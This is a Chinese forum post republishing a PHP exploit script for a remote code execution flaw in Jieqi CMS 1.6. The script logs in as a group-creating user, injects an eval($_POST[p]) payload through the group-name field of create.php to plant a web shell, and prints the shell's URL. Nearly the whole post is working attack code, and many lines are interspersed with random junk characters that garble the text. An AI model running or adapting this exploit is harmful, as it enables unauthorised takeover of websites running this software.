杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。# G3 @, [/ V8 K/ v- g
) o( M. K& z! r% y1 z0 c% z
+ R& U7 r6 ~; s' o/ d该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。& U# i* o# J% j: h
需要有一个能创建圈子的用户。& p+ O* h7 U6 s) i0 Z3 L# C! T" B w
6 s/ N7 }$ n8 a) s2 n3 Q<?php/ @4 C) \8 ?4 i. T! L$ F9 w- _# R
% r+ |/ t( {" A" h# I0 j; E- T
print_r('& C/ }$ ~! f. N2 G5 e; j7 P# o
+---------------------------------------------------------------------------+
2 ]* W' v) o) \/ F# n$ xJieqi CMS V1.6 PHP Code Injection Exploit6 V6 {* z( G' U; d1 E
by flyh4t
- F8 t n+ @ T8 [' Y; ` cmail: phpsec at hotmail dot com9 }. c8 K1 W/ f8 t2 }# M1 f- D5 H
team: http://www.wolvez.org
. r0 f C; o# C0 D/ D4 w$ G+---------------------------------------------------------------------------+- u" l; h3 M# W- b
'); /**
) U; F* J# s9 ]# y; g: | * works regardless of php.ini settings7 y1 W) N5 J: p' f3 e+ l9 @
*/ if ($argc < 5) { print_r('
- P$ V& U' K& O- B! [" A: s+---------------------------------------------------------------------------+
: L9 Y3 [ O% ]# @Usage: php '.$argv[0].' host path username# {7 n2 r9 s5 |+ \- G O6 h
host: target server (ip/hostname)
. `: e7 w- \5 i& N/ Ypath: path to jieqicms
' W4 `" }4 c; a9 G% guasename: a username who can create group6 ^3 S7 K" Y3 h+ g/ y! {! }
Example:* ^" w' F2 Y4 h5 K
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
$ k: R1 `8 w, |8 N% Q+---------------------------------------------------------------------------+6 q. E2 J* Z- M2 b$ f# H
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
T: D# ^. n2 y7 n, m, hContent-Disposition: form-data; name="gname"
- z# A4 _) U. A4 l( ^ ( N# n8 @, \* Y4 O
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t1 v2 h) H' z0 L M Q0 o
-----------------------------232811682799614 y D% D5 i* ~4 k4 R- A9 [
Content-Disposition: form-data; name="gcatid"
9 y3 [. v# Z8 H: N1 J8 I, O ( a2 l3 s! D/ C% i K j% H% i
1' C& x+ l" V+ t7 R$ G
-----------------------------23281168279961, x o9 |* R4 W
Content-Disposition: form-data; name="gaudit"8 z; f' D& ~% L- F+ N8 K+ S
Q6 k+ r! Q/ `- r! H; I
1; m- Q; T7 u) b" L
-----------------------------23281168279961
! n! j2 I0 l/ J/ GContent-Disposition: form-data; name="gbrief"
0 D' j) j4 x9 Q7 u . [0 Y% z, w# j
1
( i+ T8 @* J( [; \ |( F-----------------------------23281168279961--
, D0 x; v, P1 M' g9 @8 q2 H: Q'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com! t+ O9 m8 S! D. t# {. S+ b6 d
2 h$ x# ?! F) O. R" vpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对